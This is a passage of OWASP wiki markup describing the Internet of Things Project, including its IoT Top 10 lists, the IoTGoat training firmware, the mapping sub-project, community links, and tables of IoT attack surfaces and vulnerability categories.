{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]<br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=250073
OWASP Internet of Things Project
2019-04-12T20:37:13Z
<p>Aaron.guzman: /* Internet of Things (IoT) Top 10 2018 */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook at the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem. Typically, lists have shortcomings and cannot cover every aspect of an IoT environment. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed.<br />
<br />
{{Social Media Links}}<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known attacks (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
